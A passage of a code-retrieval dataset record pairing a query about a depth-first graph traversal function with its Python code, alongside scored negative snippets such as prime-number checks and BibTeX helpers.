2\n elif n == 2:\n return True\n\n # Case 2: n is even\n elif n % 2 == 0:\n return False\n\n # Case 3: n is odd\n for i in range(3, ceil(sqrt(n))+1, 2):\n if n % i == 0:\n return False\n\n return True", "def is_prime(n):\n\t\n\tif n < 2:\n\t\treturn False\n\t\n\tif not n % 2:\n\t\treturn False\n\t\n\tfor possible_factor in range(3, int(sqrt(n)) + 1, 2):\n\t\tif not n % possible_factor:\n\t\t\treturn False\n\treturn True", "def isPrime(n):\n for i in range (2, n/2+1):\n if n % i == 0:\n return False\n return True", "def is_prime(n):\n if n <= 1: return False\n if n <= 3: return True\n\n if (n % 2 == 0 or n % 3 == 0):\n return False\n\n i = 5\n while i * i <= n:\n if n % i == 0 or n % (i + 2) == 0:\n return False\n i += 6\n return True", "def is_prime(n):\n k = 2\n while n % k != 0:\n k += 1\n if k < n:\n return False\n else:\n return True", "def prime(n: int) -> bool:\n factors = find_first(lambda i: n % i == 0, range(2, int(math.sqrt(n) + 1)))\n return len(list(factors)) == 0", "def prime(n: int) -> bool:\n factors = find_first(lambda i: n % i == 0, range(2, int(math.sqrt(n) + 1)))\n return len(list(factors)) == 0", "def isprime(n):\n if n == 2:\n return True\n if n == 3:\n return True\n if n % 2 == 0:\n divisors[n] = n // 2\n return False\n if n % 3 == 0:\n divisors[n] = 3\n return False\n\n if n in primes:\n return primes[n]\n\n i = 5\n w = 2\n\n while i * i <= n:\n if n % i == 0:\n divisors[n] = n // i\n primes[n] = False\n return False\n i += w\n w = 6 - w\n\n primes[n] = True\n return True", "def is_prime(n):\n if n == 2:\n return True\n\n if n < 2 or n % 2 == 0:\n return False\n\n for i in range(3, int(sqrt(n)+1), 2):\n if n % i == 0:\n return False\n\n return True", "def is_prime(n):\n assert n > 3\n k = int(log2(n))\n m = n - 1\n d = 0\n while(m % 2 == 0):\n m //= 2\n d += 1\n for _ in range(k):\n a = randint(2, n - 2)\n x = pow(a, m, n)\n if x == 1 or x == n - 1:\n continue\n for _ in range(d - 1):\n x = pow(x, 2, n)\n if x == 1:\n return 0\n if x == n - 1:\n break\n if x != n - 1:\n return 0\n return 1", "def is_prime(n):\n i, count = 2, 0\n while i < n:\n if n % i == 0:\n count += 1\n break\n i += 1\n if count == 0 and n != 1:\n return True\n else:\n return False", "def is_prime(n):\n for i in range(2,n):\n if n % i == 0:\n return False\n return True", "def is_prime(n):\n assert n >= 1, \"n is not a positive integer\"\n k = 2\n if n == 1:\n flag = False\n else:\n flag = True\n while k 
<= sqrt(n):\n if n % k == 0:\n flag = False\n break\n k += 1\n return flag", "def is_prime(n):\n if n <= 1:\n return False\n for i in range(2, n):\n if n % i == 0:\n return False\n return True", "def isPrime(n):\n\n if n < 2:\n return False\n elif n in {2,3}:\n return True\n elif n % 2 == 0:\n return False\n else:\n for i in range(3,math.floor(math.sqrt(n))+1,2):\n if n % i == 0:\n return False\n else:\n return True", "def isprime(n):\n for i in range(2, n):\n if n % i == 0:\n return False\n return True", "def is_prime(n):\n \n if n < 2:\n return False\n elif n == 2 or n == 3 or n == 5:\n return True\n elif n % 2 == 0 or n % 3 == 0 or n % 5 == 0:\n return False\n \n i = 6\n sqrt_n = int(math.ceil(math.sqrt(n)))\n \n while i <= sqrt_n + 1:\n if n % (i - 1) == 0 or n % (i + 1) == 0:\n return False\n i += 6\n return True", "def isprime(n=936):\n if n < 3: return False\n for i in range(2, n):\n if n % i == 0:\n return False\n return True", "def factorPR(n):\r\n\tfor slow in [2,3,4,6]:\r\n\t\tnumsteps=2*math.floor(math.sqrt(math.sqrt(n))); fast=slow; i=1\r\n\t\twhile i<numsteps:\r\n\t\t\tslow = (slow*slow + 1) % n\r\n\t\t\ti = i + 1\r\n\t\t\tfast = (fast*fast + 1) % n\r\n\t\t\tfast = (fast*fast + 1) % n\r\n\t\t\tg = gcd(fast-slow,n)\r\n\t\t\tif (g != 1):\r\n\t\t\t\tif (g == n):\r\n\t\t\t\t\tbreak\r\n\t\t\t\telse:\r\n\t\t\t\t\treturn g\r\n\treturn 1", "def prime(n):\n \n flag = 1 # this will be 0 --> if no prime \n for i in range(2, n):\n if (n%i == 0):\n flag = 0\n break #Most important to break once number is decided as not prime; even once divisible, no need to check further for that number \n else :\n flag = 1\n \n return flag", "def nPrime(n):\n\n start = 1\n while n != 1:\n start += 2\n if isPrime(start):\n n -= 1\n # end of if\n\n return start", "def is_prime(n: int) -> bool:\n if n <= 3:\n return n > 1\n if n % 2 == 0 or n % 3 == 0:\n return False\n i = 5\n while i ** 2 <= n:\n if n % i == 0 or n % (i + 2) == 0:\n return False\n i += 6\n return True", "def prime(n: int) -> bool:\n if len(divisors(n)) > 2 or n < 1:\n return False\n else:\n return True", "def evansMod(x,n):\n if x%n == 0:\n return 1\n else:\n return 0", "def is_prime(n):\n # We know 1 is not a prime number\n if n == 1:\n return False\n\n i = 2\n # This will loop from 2 to int(sqrt(x))\n while i*i <= n:\n # Check if i divides x without leaving a remainder\n if n % i == 0:\n # This means that n has a factor in between 2 and sqrt(n)\n # So it is not a prime number\n return False\n i += 1\n # If we did not find any factor in the above loop,\n # then n is a prime number\n return True", "def is_prime(n):\n if n <= 1:\n return False\n if n < 4:\n return True\n if n % 2 == 0:\n return False\n if n < 9:\n return True\n if n % 3 == 0:\n return False\n\n limit = int(math.floor(math.sqrt(n)))\n i = 5\n while i <= limit:\n if n % i == 0:\n return False\n if n % (i + 2) == 0:\n return False\n i += 6\n return True", "def primes(n):\n primfac = {}\n primfac = defaultdict(lambda: 0, primfac)\n while (n % 2) == 0:\n primfac[2] += 1 \n n //= 2\n d = 3\n while d*d <= n:\n while (n % d) == 0:\n primfac[d] += 1 # supposing you want multiple factors repeated\n n //= d\n d += 2\n if n > 1:\n primfac[n] = 1\n return primfac", "def is_prime(n: int) -> bool:\n if n <= 1:\n return False\n\n for i in range(2, int(n ** 0.5) + 1):\n if n % i == 0:\n return False\n return True", "def get_prime_factor(n):\n if n % 2 == 0:\n return 2\n for num in range(3, n + 1, 2):\n if n % num == 0:\n return num", "def is_prime(n):\n for k in range(2, (n // 2) + 1):\n if 
n % k == 0:\n return False\n \n return True", "def factorPR(n):\n\tnumsteps=2*math.floor(math.sqrt(math.sqrt(n)))\n\tfor additive in range(1,5):\n\t\tfast=slow=1; i=1\n\t\twhile i<numsteps:\n\t\t\tslow = (slow*slow + additive) % n\n\t\t\ti = i + 1\n\t\t\tfast = (fast*fast + additive) % n\n\t\t\tfast = (fast*fast + additive) % n\n\t\t\tg = gcd(fast-slow,n)\n\t\t\tif (g != 1):\n\t\t\t\tif (g == n):\n\t\t\t\t\tbreak\n\t\t\t\telse:\n\t\t\t\t\treturn g\n\treturn 1", "def phi(n: int) -> int:\n result = 1\n for i in range(2, n):\n if gcd(i, n) == 1:\n result += 1\n return result", "def isprime(n):\n # make sure n is a positive integer\n n = abs(int(n))\n # 0 and 1 are not primes\n if n < 2:\n return False\n # 2 is the only even prime number\n if n == 2:\n return True\n # all other even numbers are not primes\n if not n & 1:\n return False\n # range starts with 3 and only needs to go up the squareroot of n\n # for all odd numbers\n for x in range(3, int(int(n ** 0.5) ** 0.5) + 1, 2):\n if n % x == 0:\n return False\n return True", "def is_prime(n):\n if n < 2:\n return False\n if n == 2 | n == 3:\n return True\n if n % 2 == 0 | n % 3 == 0:\n return False\n for i in range(2, int(sqrt(n))+1):\n if n % i == 0:\n return False\n return True", "def is_prime(n):\n if n < 2:\n return False\n if n == 2 | n == 3:\n return True\n if n % 2 == 0 | n % 3 == 0:\n return False\n for i in range(2, int(sqrt(n))+1):\n if n % i == 0:\n return False\n return True", "def is_prime(n):\n\tprime = True\n\tif n == 1:\n\t\tprime = False\n\tc = 2\n\twhile c * c <= n:\n\t\tif n % c == 0:\n\t\t\tprime = False\n\t\tc += 1\n\treturn prime", "def is_prime(n):\n\tb = 2\n\twhile b <= math.sqrt(n):\n\t\tif n % b == 0:\n\t\t\treturn False\n\t\tb += 1\n\treturn True", "def is_prime(n, k=10):\n if n == 2 or n == 3:\n return True\n if not n & 1 or n < 2:\n return False\n m = n - 1\n s = 1\n d = m >> 1\n while not d & 1:\n s += 1\n d >>= 1\n for i in range(k):\n a = randint(2, n - 2)\n x = expmod(a, d, n)\n if x == 1 or x == n - 1:\n continue\n for r in range(1, s):\n x = x * x % n\n if x == 1:\n return False\n if x == n - 1:\n break\n else:\n return False\n return True", "def test_prime(n):\n if SIEVE[n]:\n return True\n else:\n return False", "def is_prime(n):\n for k in range(2, (n // 2) + 1):\n if n % k == 0:\n return False\n\n return True", "def primenumber(x):\n if x >= 2:\n for y in range(2,x):\n if not (x % y):\n return False\n else:\n return False\n return True", "def isprime(n):\n\n if n % 2 == 0:\n return False\n\n # else take square root and iterate over all uneven (step 2) numbers\n sqrt_n = int(math.floor(math.sqrt(n)))\n for i in range(3, sqrt_n + 1, 2):\n if n % i == 0:\n return False\n\n return True", "def trial_div(n: int) -> bool:\n if n == 1:\n return False\n i = 2\n while i**2 <= n:\n if n % i == 0:\n return False\n i += 1\n return True", "def is_factor(f, n):\r\n return n%f == 0", "def isprime(n: int) -> bool:\r\n if n > 1:\r\n for i in range(2, int(n / 2) + 1):\r\n if (n % i) == 0:\r\n return False\r\n else:\r\n return True\r\n\r\n else:\r\n return False", "def is_prime(n):\n\n def prime_helper(index):\n if index == n:\n return True\n elif n % index == 0 or n == 1:\n return False\n else:\n return prime_helper(index + 1)\n\n return prime_helper(2)", "def sopf(n, primes):\r\n total = 0\r\n for p in primes:\r\n if n % p == 0:\r\n total += p\r\n while n // p == 0:\r\n n //= p\r\n return total", "def is_prime(n):\n \n for i in range(3, int(n**0.5+1), 2):\n if n % i == 0:\n print(n,'is not prime')\n return False\n\n 
print(n,'is prime') \n return True", "def prime_t(n: int) -> bool:\n tests = set(range(2, int(math.sqrt(n) + 1)))\n non_factors = set(takewhile(lambda i: n % i != 0, tests))\n return tests == non_factors", "def prime_t(n: int) -> bool:\n tests = set(range(2, int(math.sqrt(n) + 1)))\n non_factors = set(takewhile(lambda i: n % i != 0, tests))\n return tests == non_factors", "def is_prime(n):\n test_vals = [2, 3, 5, 7, 11, 13, 17, 19, 23, 29, 31, 37]\n if n in test_vals:\n return True\n d = n - 1\n s = 0\n while not d & 1:\n d = d >> 1\n s += 1\n for a in test_vals:\n for r in range(0, s):\n if (a ** (d * (1 << r))) % n != (n - 1) \\\n and (a ** d) % n != 1:\n return False\n return True", "def isPrime(n: int) -> bool:\n if n == 1:\n return False\n # handle boundary conditions\n if n == 2 or n == 3:\n return True\n # Now check for divisibility of n by 2 & 3\n if n % 2 == 0 or n % 3 == 0:\n return False\n\n i = 5\n while (i * i <= n):\n if n % i == 0 or n % (i + 2) == 0:\n return False\n\n i = i + 6\n return True", "def is_Prime(n):\n\n # make sure n is a positive integer\n n = abs(int(n))\n # 0 and 1 are not primes\n if n < 2:\n return False\n # 2 is the only even prime number\n if n == 2:\n return True\n # all other even numbers are not primes\n if not n & 1:\n return False\n # range starts with 3 and only needs to go up the squareroot of n\n # for all odd numbers\n for x in range(3, int(n ** 0.5) + 1, 2):\n if n % x == 0:\n return False\n return True", "def is_prime(n, i):\r\n if n == 2: # 2 is prime\r\n return True\r\n\r\n elif n < 2: # less then 2 or even not prime\r\n return False\r\n\r\n elif n % i == 0: # divisible by 3 or greater not prime\r\n return False\r\n\r\n else:\r\n if int(n ** 0.5) + 1 == i: # no divisor found then prime\r\n return True\r\n else:\r\n return is_prime(n, i + 1) # recursive step\r", "def is_prime(n):\n if n < 2 or n - round(n) != 0:\n print('Numbers smaller than 2 and non-integers are never prime.')\n return False\n if n == 2:\n return True\n if n % 2 == 0:\n return False\n for i in range(3, int(sqrt(n)+2), 2):\n if n % i == 0:\n return False\n return True", "def primes1(n):\n sieve = [True] * (n//2)\n for i in range(3,int(n**0.5)+1,2):\n if sieve[i//2]:\n sieve[i*i//2::i] = [False] * ((n-i*i-1)//(2*i)+1)\n return [2] + [2*i+1 for i in range(1,n//2) if sieve[i]]", "def is_prime(n):\n \"*** YOUR CODE HERE ***\"\n def helper_prime(n, div):\n if div >= n:\n return 0\n if n % div == 0:\n return 1 + helper_prime(n, div + 1)\n else:\n return helper_prime(n, div + 1)\n\n if helper_prime(n, 2) > 0:\n return False\n return True", "def is_circular_prime(n):\r\n\r\n # pdb.set_trace()\r\n s = str(n)\r\n for i in xrange(len(s)):\r\n if not is_prime(n):\r\n return False\r\n s = s[1:] + s[0]\r\n n = int(s)\r\n\r\n return True", "def radicale(n):\n r = 1\n for p in primi(n+1):\n if p>n:\n break\n if n%p==0:\n r *= p\n n = n//p\n return r" ]
[ "0.7359284", "0.7342926", "0.7322676", "0.7248131", "0.7242679", "0.7216649", "0.7209011", "0.719946", "0.71798897", "0.7179453", "0.71572655", "0.714357", "0.7136565", "0.7130218", "0.7114926", "0.71052164", "0.70893246", "0.7086887", "0.7079261", "0.7075418", "0.7074846", "0.70698917", "0.70610183", "0.7060515", "0.7044326", "0.70310485", "0.70280886", "0.7026237", "0.7023004", "0.70214355", "0.701942", "0.7014844", "0.70148206", "0.701019", "0.7006905", "0.6980025", "0.6977384", "0.6971704", "0.6967824", "0.6964793", "0.69645214", "0.69578844", "0.69414467", "0.6941349", "0.6936703", "0.69303983", "0.69249266", "0.69249266", "0.69223964", "0.691929", "0.6912908", "0.6911879", "0.6910018", "0.69021946", "0.6900566", "0.6899434", "0.6889722", "0.6884336", "0.68732315", "0.68665504", "0.6859152", "0.6854181", "0.68466246", "0.684068", "0.6834484", "0.68322724", "0.6826525", "0.68158984", "0.6814268", "0.68126047", "0.68111324", "0.6805938", "0.6799933", "0.6799645", "0.6796112", "0.6796112", "0.67865974", "0.67816794", "0.67768395", "0.67629755", "0.67557645", "0.6745635", "0.6742998", "0.67421955", "0.6739599", "0.6735307", "0.6731422", "0.6729772", "0.6728248", "0.67060256", "0.67060256", "0.67046183", "0.6701624", "0.6695666", "0.66949934", "0.6692411", "0.66900545", "0.6661951", "0.66581875", "0.6644557" ]
0.7320272
3
The function takes a dictionary with a list of neighbors for each vertex. It searches the graph depth-first and returns the order in which the vertices were visited
def DFS(graph):
    stack = []
    actual_position = '1'
    stack.append(actual_position)
    visited_vertices = []
    while True:
        for neighbors in graph.values():
            try:
                neighbors.remove(actual_position)  # remove neighbors equal to the current position from every vertex of the graph
            except ValueError:
                pass
        visited_vertices.append(actual_position)  # record the visited vertex
        try:
            actual_position = min(graph[actual_position])  # move to the neighbor with the lowest number
        except ValueError:
            stack.remove(actual_position)  # take it off the stack
            if stack == []:
                return visited_vertices
            actual_position = stack.pop(-1)  # set the current position from the top of the stack
        stack.append(actual_position)  # push the current position onto the stack
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def list_publications(bib_format=\"dict\"):\n\n def get_bibtex(key, value):\n total_keys = [\n \"title\",\n \"journal\",\n \"volume\",\n \"issue\",\n \"number\",\n \"pages\",\n \"numpages\",\n \"year\",\n \"month\",\n \"publisher\",\n \"url\",\n \"doi\",\n \"issn\",\n ]\n bibtex_str = (\n \"@article{\"\n + key\n + \",\\n\"\n + \" author={\"\n + \" and \".join(value[\"author\"])\n + \"},\\n\"\n )\n for key in total_keys:\n if key in value.keys():\n bibtex_str += \" \" + key + \"={\" + value[key] + \"},\\n\"\n bibtex_str += \"}\\n\"\n return bibtex_str\n\n def get_apa(value):\n apa_str = \" & \".join(value[\"author\"])\n if \"year\" in value.keys():\n apa_str += \" (\" + value[\"year\"] + \"). \"\n if \"title\" in value.keys():\n apa_str += value[\"title\"] + \". \"\n if \"journal\" in value.keys():\n apa_str += value[\"journal\"] + \", \"\n if \"volume\" in value.keys():\n apa_str += value[\"volume\"] + \", \"\n if \"pages\" in value.keys():\n apa_str += value[\"pages\"] + \". \"\n if \"doi\" in value.keys():\n apa_str += \"doi: \" + value[\"doi\"] + \"\\n\"\n return apa_str\n\n publication_dict = s.publication_lst\n if bib_format.lower() == \"dict\":\n return publication_dict\n elif bib_format.lower() == \"bibtex\":\n total_str = \"\"\n for pub in publication_dict:\n for key, value in pub.items():\n total_str += get_bibtex(key, value)\n return total_str\n elif bib_format.lower() == \"apa\":\n total_str = \"\"\n for pub in publication_dict:\n for key, value in pub.items():\n total_str += get_apa(value)\n return total_str\n else:\n raise ValueError(\"Supported Bibformats are ['dict', 'bibtex', 'apa']\")", "def load_bib(bib_name):\n print(\"Reading BibTex File: {}\".format(bib_name))\n curdir = osp.abspath('.')\n bib_path = osp.join(curdir, bib_name)\n print(\"Path: {}\".format(bib_path))\n print('Creating library..')\n add_dir('library')\n with open(bib_path, 'r') as f:\n # txt = f.read()\n line = f.readline()\n i = 0\n start = False\n while line:\n i += 1\n if (line.find('@')==1) or start: # reading entry\n if start == False:\n filename = get_name(line)\n start = True\n if line.find('title')==1:\n link = get_link(line)\n if link is not None:\n savepath = osp.join(curdir, 'library', filename+'.pdf')\n save_pdf(link, savepath)\n if (line.find('}')==1): # end of entry\n start=False\n line = f.readline()\n print(i) # print line number", "def make_bibtex(self):\n\n\t\t# bib = requests.request('GET', 'http://dx.doi.org/' + self.doi, ", "def get_all_bibliographies(session: CondorSession) -> List[sc.Bibliography]:\n return [sc.Bibliography(bib) for bib in Bibliography.list(session)]", "def mi_biblioteca(request):\n template = \"libros/mi_biblioteca.html\"\n perfil_usuario = obtener_perfil(request.user)\n grupos_usuario = UsuariosGrupo.objects.filter(perfil=perfil_usuario, activo=True).select_related(\"grupo\")\n libros_disponibles = LibrosDisponibles.objects.filter(perfil=perfil_usuario, disponible=True, prestado=False)\n libros_no_disponibles = LibrosDisponibles.objects.filter(perfil=perfil_usuario, disponible=False, prestado=False)\n libros_prestados = LibrosPrestados.objects.filter(perfil_dueno=perfil_usuario, fecha_devolucion=None)\n\n grupos_list = [(g.grupo.id, g.grupo.nombre) for g in grupos_usuario]\n grupos_json = json.dumps(grupos_list)\n\n context = {\n 'grupos_json': grupos_json,\n 'libros_disponibles': libros_disponibles,\n 'libros_prestados': libros_prestados,\n 'libros_no_disponibles': libros_no_disponibles\n }\n\n return render(request, template, context)", "def get_doc_prov(j, 
gcis_url, refList):\n gcis_ns = \"https://gcis-search-stage.jpl.net:3000/gcis.owl#\"\n doc = ProvEsDocument()\n bndl = None\n \n#to get people attributed to, you need to grab article -> jornal_identifier -> look up in references\n# for ref in refList:\n# if ref['child_publication'] == j['uri']:\n \n\n\n doc_attrs = [\n (\"prov:type\", 'gcis:Article'),\n (\"prov:label\", j['title']),\n (\"prov:location\", j['uri']),\n #(\"prov:wasAttributedTo\", j['']),\n ]\n doc.entity('bibo:%s' % j['identifier'], doc_attrs)\n\n prov_json = json.loads(doc.serialize())\n\n return prov_json", "def set_bibs(self, number):", "def process_bibliography(style, reference_list):\n processed_bibliography = Element(\"ol\", attrib={\"class\":\"bibliography\"})\n\n for reference in reference_list:\n ref = SubElement(processed_bibliography, \"li\", \n attrib={\"property\":\"dc:references\"})\n\n for style_node in style.bibliography.layout:\n process_node(ref, style_node, style.macros, reference) \n\n return(processed_bibliography)", "def load_bib_lines(filenames):\n \n bibliography = {}\n bibsection = 0\n biberrors = 0\n filenames = expandFilenames(filenames)\n for line in fileinput.input(filenames, mode='rU'):\n #iterate until we get to a bibitem section\n line = line.strip()\n if line.startswith(r\"\\begin{thebibliography}\"):\n #mark lines\n bibitems = []\n bibsection = 1\n continue\n elif line.startswith(r\"\\end{thebibliography}\"):\n bibliography[fileinput.filename()] = bibitems\n bibitems = []\n bibsection = 0\n fileinput.nextfile()\n\n if bibsection == 1:\n if not line.isspace():\n try:\n line = line.decode(\"ascii\")\n candline = removeComment(line)\n if candline:\n bibitems.append(candline)\n except UnicodeDecodeError:\n print \"Special Character on line {0} in file {1}\".format(fileinput.filelineno(), fileinput.filename())\n print line\n print \"-\".center(80, '-')\n biberrors += 1\n \n if biberrors > 0:\n print \"{0} errors detected. 
Received non-ASCII input\".format(biberrors)\n #return an empty list so we don't process bad output\n return []\n \n return split_bibitems(bibliography)", "def getBooks(self):\n srcIds = set([srcId for srcId,altId in self.libMap.values()])\n altIds = set([altId for srcId,altId in self.libMap.values()])\n factory = {'BOOK':Book}\n for modName in mwIniFile.loadOrder:\n print modName\n fileRep = FileRep(modInfos[modName],False)\n fileRep.load(keepTypes=None,factory=factory)\n for record in fileRep.records:\n if record.name == 'BOOK':\n bookId = record.getId()\n if bookId in srcIds:\n print '',bookId\n self.srcBooks[bookId] = (record,modName)\n elif bookId in altIds:\n print '',bookId\n self.altBooks[bookId] = (record,modName)", "def fill(self):\n if self.source == 'citations':\n url = self._scholarly.URLS(\"CITATIONPUB\").format(self.id_citations)\n soup = self._scholarly._get_soup(\n self._scholarly.URLS('HOST').format(url))\n self.bib['title'] = soup.find('div', id='gsc_vcd_title').text\n\n if soup.find('a', class_='gsc_vcd_title_link'):\n self.bib['url'] = soup.find(\n 'a', class_='gsc_vcd_title_link')['href']\n\n for item in soup.find_all('div', class_='gs_scl'):\n key = item.find(class_='gsc_vcd_field').text\n val = item.find(class_='gsc_vcd_value')\n if key == 'Authors':\n self.bib['author'] = ' and '.join(self.get_authorlist(val))\n elif key == 'Journal':\n self.bib['journal'] = val.text\n elif key == 'Volume':\n self.bib['volume'] = val.text\n elif key == 'Issue':\n self.bib['number'] = val.text\n elif key == 'Pages':\n self.bib['pages'] = val.text\n elif key == 'Publisher':\n self.bib['publisher'] = val.text\n elif key == 'Publication date':\n self.bib['year'] = arrow.get(val.text).year\n elif key == 'Description':\n if val.text[0:8].lower() == 'abstract':\n val = val.text[9:].strip()\n self.bib['abstract'] = val\n elif key == 'Total citations':\n self.id_scholarcitedby = re.findall(\n self._scholarly.URLS('SCHOLARPUBRE'), val.a['href'])[0]\n\n # number of citation per year\n years = [int(y.text) for y in soup.find_all(class_='gsc_vcd_g_t')]\n cites = [int(c.text) for c in soup.find_all(class_='gsc_vcd_g_al')]\n self.cites_per_year = dict(zip(years, cites))\n\n if soup.find('div', class_='gsc_vcd_title_ggi'):\n self.bib['eprint'] = soup.find(\n 'div', class_='gsc_vcd_title_ggi').a['href']\n self._filled = True\n\n elif self.source == 'scholar':\n self.bib['add_to_lib'] = self.url_add_sclib\n\n try:\n bibtex = self._scholarly._get_soup(self.url_scholarbib)\n bibtex = bibtex.find('pre').string\n self.bib.update(bibtexparser.loads(bibtex).entries[0])\n self.bib['author_count'] = str(\n len(self.bib['author'].split('and')))\n self.bib['age'] = str(\n int(date.today().year) - int(self.bib['year']))\n except:\n # did not find year\n pass\n\n self._filled = True\n return self", "def bibtex(self) -> str:\n a = BibDatabase()\n a.entries = [self.bib]\n return bibtexparser.dumps(a)", "def getBibTeX(bibref,tag_suf,outFile):\n if bibref == '1988iras....1.....B':\n bibtex = ['>@article{1988iras....1.....B,\\n',\n ' title={Infrared astronomical satellite (IRAS) catalogs and atlases. 
Volume 1: Explanatory supplement},\\n',\n ' keywords = {All Sky Photography, Catalogs, Indexes (Documentation), Infrared Astronomy Satellite, Cosmology, Galaxies, Star Formation, Stellar Evolution, Astrophysics},\\n',\n ' author={Beichman, CA and Neugebauer, G and Habing, HJ and Clegg, PE and Chester, Thomas J},\\n',\n ' year=1988,\\n',\n ' volume = {1},\\n', \n ' month = jan,\\n', \n ' adsurl = {https://ui.adsabs.harvard.edu/abs/1988iras....1.....B},\\n'\n '}\\n']\n else:\n baseURL = 'https://ui.adsabs.harvard.edu/abs/'\n suf = '/exportcitation'\n lines = urllib.request.urlopen(baseURL+bibref+suf).readlines()\n lines = [l.decode('utf-8') for l in lines] # remove additional webpage encoding\n \n bibtex = []\n for l in range(0, len(lines)):\n if 'export-textarea ' in str(lines[l]):\n bibtex.append(str(lines[l]))\n t = l+1\n \n while '</textarea>' not in str(lines[t+1]):\n bibtex.append(str(lines[t])) \n t += 1\n \n for item in bibtex:\n if 'author' in item.split('=')[0]:\n auth = item.split('=')[1].split(',')[0]\n for i in string.punctuation:\n auth = auth.replace(i, '')\n auth = auth.replace(' ', '')\n if 'year' in item.split('=')[0]:\n yr = item.split('=')[1].split(',')[0]\n yr = yr.replace(' ', '')\n \n try:\n bibtex[0] = bibtex[0].split('>')[1].split('{')[0]+'{'+auth+yr+tag_suf+',\\n'\n except UnboundLocalError as ule:\n print(bibtex)\n print('')\n print(ule)\n sys.exit()\n \n with open(outFile, 'a') as o:\n for item in bibtex:\n item = item.replace('&#34;', '\"')\n item = item.replace('&#39;', \"'\")\n item = item.replace('&amp;', \"&\")\n o.write(item)\n o.write('\\n')\n \n return auth+yr+tag_suf", "def cargar_bolsa(self,lista):\n self.bolsa = lista", "def fetch_paper_books():\r\n ct = datetime.datetime.now()\r\n print('Ultima stampa di paper: %s' % ct)\r\n books = Book.objects.all()\r\n for language in settings.LANGUAGES:\r\n activate(language[0])\r\n lan = get_language()\r\n print('Lingua corrente: %s' % lan)\r\n for book in books:\r\n if book.paper_id:\r\n print('Elaboro {}'.format(book.title_it))\r\n paper_soup = render_dropbox_paper_soup(book.paper_id)\r\n filepath = settings.BASE_DIR / 'templates/ebooks/partials/book_paper_{}_{}.html'.format(book.id, language[0]) \r\n with open(filepath, 'w', encoding='utf-8') as f:\r\n print('Stampo %s' % filepath)\r\n f.write(str(paper_soup))\r\n else:\r\n pass\r\n return 1", "def get_wordlists():\n\n\tCS = {'ACM', 'IEEE', 'Computer Science', 'Artificial Intelligence',\n\t\t'Pattern Recognition', 'Computer Vision', 'Machine Learning',\n\t\t'Signal Processing', 'Electrical Engineering', 'Image Processing',\n\t\t'Data Mining', 'Neural Networks', 'Computer Graphics', 'Graphics',\n\t\t'Language Processing', 'Internet', 'Intelligent Systems',\n\t\t'Robotic','Data','Software', 'Machine Vision', 'Image Analysis',\n\t\t'Scientific Computing', 'SIAM', 'Malware','World Wide Web', \n\t\t'Computational Intelligence', 'Computational Linguistics',\n\t\t'Computational linguistics','Algorithm','Computer','ITiCSE',\n\t\t'ITICSE','Machine learning','Learning','learning',\n\t\t'Artificial intelligence','CIVR','Document Analysis'}\n\n\tbio = {'Biology', 'Microbiology', 'Molecular', 'Medical', 'Biological',\n\t\t'Cancer', 'Genome', 'Bioinformatics', 'Protein', 'Biocomputing',\n\t\t'Biomedical', 'biology', 'Medicine', 'Biosystems', 'Virology',\n\t\t'Brain', 'Psychology', 'Genetics', 'Bioengineering', 'Cell',\n\t\t'Cardiology', 'Metabolic', 'Biotechnology', 'Pathogens',\n\t\t'Pathology', 'Plant', 'PLANT', 'Virus', 
'Drug','Medicinal',\n\t\t'Neuro','Psych',\n\t\t'Genomic','Diseases','Endocrinology', 'Epidemiology',\n\t\t'Proteom','Biochem', 'DNA', 'Pharma', 'Biomedic', 'biomedica',\n\t\t'Neurobiological'}\n\n\tmath = {'Mathemati','Markov','Probability','Algebra','Network',\n\t\t'Topology','Optimization', 'Geometr','Statistic','Algorithm',\n\t\t'Graph ','Graphs','Combinatori','Riemann Surfaces','Permutation Groups',\n\t\t'Functional Analysis', 'SIAM','Fixed Point','Wavelet','Statistics',\n\t\t'Linear Regression','Fractal','geometry','Multivariate','Chaos',\n\t\t'mathemati','Kernel'}\n\n\tlinguistics = {}\n\n\tcomputer_vision = {}\n\n\tchemistry = {}\n\n\tphysics = {}\n\n\t# Rename \"Computer Vision\" to \"Image Processing\"?\n\ttopic_names = ['Computer Science','Biology','Mathematics','Chemistry',\n\t\t'Physics','Computer Vision','Natural Language Processing']\n\ttopics = [CS, bio, math]#, linguistics, computer_vision, chemistry, physics]\n\n\treturn {topic_names[i]:topics[i] for i in range(len(topics))}", "def ludnosc(lista):\n # wynik - lista zawierajaca wynik koncowy dzialania funkcji(lata i wartosci dla poszczegolnych panstw)\n wynik = []\n for panstwo in lista:\n # rok - lista zawierajaca lata\n # wartosc - lista zawierajaca wartosci dla lat\n rok = []\n wartosc = []\n for element in panstwo:\n # sprawdzenie czy klucz posiada odpowiednia wartosc\n if element[1].get('key') == \"EN.POP.DNST\":\n # dodanie roku do listy\n rok.append(int(element[2].text))\n # rozpatrywanie przypadku w ktorym wartosc jest None\n if element[3].text is None:\n wartosc.append(element[3].text)\n else:\n wartosc.append(float(element[3].text))\n # dodawanie list dla poszczegolnych panstw do listy wynikowej\n wynik.append(rok)\n wynik.append(wartosc)\n\n return wynik", "def split_bibitems(bibliography):\n \n refs = []\n for filename, bib in bibliography.iteritems():\n split_ind = []\n for ind, item in enumerate(bib):\n if item.startswith(r\"\\bibitem\"):\n split_ind.append(ind)\n \n for ref in partition(bib, split_ind):\n if ref:\n refs.append(RefObj.RefObj(filename, refstr='\\n'.join(ref)))\n return refs", "def _load_biblical_terms_list(self, biblical_terms_list, _textin=''):\n if not _textin:\n fin = codecs.open(biblical_terms_list, mode='r', \\\n encoding='utf-16')\n lines = [l.strip() for l in fin.readlines()]\n else:\n lines = _textin\n line = ' '.join([aline.strip() for aline in lines])\n html = etree.HTML(line)\n #root = etree.fromstring(line)\n #body = etree.SubElement(html, \"body\")\n body = html[1]\n table = body[0]\n terms = dict()\n for tr in table[1:]:\n term = str(tr[3].text)\n rendering = str(tr[4].text)\n terms[term] = rendering\n return(terms)", "def get_doc_prov(j, gcis_url, refList, orgList):\n doc = ProvEsDocument()\n \n org = requests.get(j['href']).json()\n \n doc_attrs = [\n (\"prov:type\", 'gcis:organization'),\n (\"prov:label\", j['name']),\n (\"prov:location\", \"%s%s\"%(gcis_url, j['uri'])),\n (\"gcis:organization_type_identifier\", j['organization_type_identifier']),\n (\"gcis:country_code\", j['country_code']),\n ]\n orgID = 'bibo:%s' % j['identifier']\n doc.agent(orgID, doc_attrs)\n\n for child in org['children']:\n cOrgURI = child['organization']\n rel = child['relationship']\n\n cOrg = next(o for o in orgList if o['uri'] == cOrgURI)\n cOrgID = 